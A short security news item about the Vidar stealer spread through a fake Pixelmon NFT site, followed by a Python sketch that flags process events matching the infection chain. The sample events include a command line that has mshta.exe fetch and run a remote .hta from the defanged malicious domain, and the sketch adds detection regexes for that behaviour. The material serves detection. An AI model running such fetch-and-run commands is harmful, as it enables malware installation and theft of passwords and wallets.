Vidar malware spread via phony Pixelmon NFT site

Threat actors have created a fake version of the Pixelmon non-fungible token website at pixelmon[.]pw, which distributes the Vidar information stealer with cryptocurrency wallet-exfiltrating capabilities, according to BleepingComputer. MalwareHunterTeam discovered that while the fake Pixelmon site's Installer.zip contains a corrupt executable, other files offered by the site do deliver malware. The setup.zip file distributed by the malicious site contains a setup.lnk shortcut, which triggers the download of a system32.hta file that in turn downloads the password-stealing Vidar malware. Once executed, the Vidar sample connects to a Telegram channel to retrieve the IP address of its command and control server. Further modules are then downloaded from the C2 for data exfiltration: Vidar can not only steal browser and application passwords but also search files across the computer, allowing it to steal cryptocurrency wallets, codes, authentication files, text files, backups, and password files.
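As an added defensive example (not from the article or from BleepingComputer's report), the following Python sketch flags process-creation events that match the stages described above: a shortcut launched from Explorer that runs mshta.exe against a remote .hta, and mshta.exe spawning a child from a user-writable directory. The event records, field names and paths are constructed for illustration; the defanged domain is the one named in the article.

```python
import re
from typing import Iterable

# Constructed process-creation events (Sysmon-style fields), modelled on the
# chain in the article: Explorer runs the .lnk, which invokes mshta against a
# remote .hta, which then drops and runs the stealer. Not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c mshta.exe http://pixelmon[.]pw/system32.hta"},
    {"id": 2, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://pixelmon[.]pw/system32.hta"},
    {"id": 3, "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Users\u\AppData\Local\Temp\setup.exe",
     "cmdline": r'"C:\Users\u\AppData\Local\Temp\setup.exe"'},
    {"id": 4, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Notepad++\notepad++.exe",
     "cmdline": r'"C:\Program Files\Notepad++\notepad++.exe" notes.txt'},
]

# mshta invoked with an http(s) URL or a UNC path as its script source.
MSHTA_REMOTE = re.compile(r"mshta(?:\.exe)?\s+[\"']?(?:https?://|\\\\)", re.I)
HTA_ARG = re.compile(r"\.hta\b", re.I)


def classify(event: dict) -> list:
    """Return the names of the detection rules that fire for one event."""
    hits = []
    cmd = event["cmdline"]
    image = event["image"].lower()
    parent = event["parent"].lower()
    # Rule 1: mshta.exe pulling its script from a remote location.
    if MSHTA_REMOTE.search(cmd):
        hits.append("mshta_remote_source")
    # Rule 2: an .hta argument in a process whose parent is explorer.exe,
    # which is what a double-clicked shortcut looks like in the tree.
    if HTA_ARG.search(cmd) and parent.endswith("explorer.exe"):
        hits.append("lnk_launched_hta")
    # Rule 3: mshta.exe spawning a child binary from a user-writable path.
    if parent.endswith("mshta.exe") and ("\\appdata\\" in image or "\\temp\\" in image):
        hits.append("mshta_child_from_user_dir")
    return hits


def flag_events(events: Iterable[dict]) -> dict:
    """Map event id -> fired rules, omitting events with no hits."""
    return {e["id"]: r for e in events if (r := classify(e))}
```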
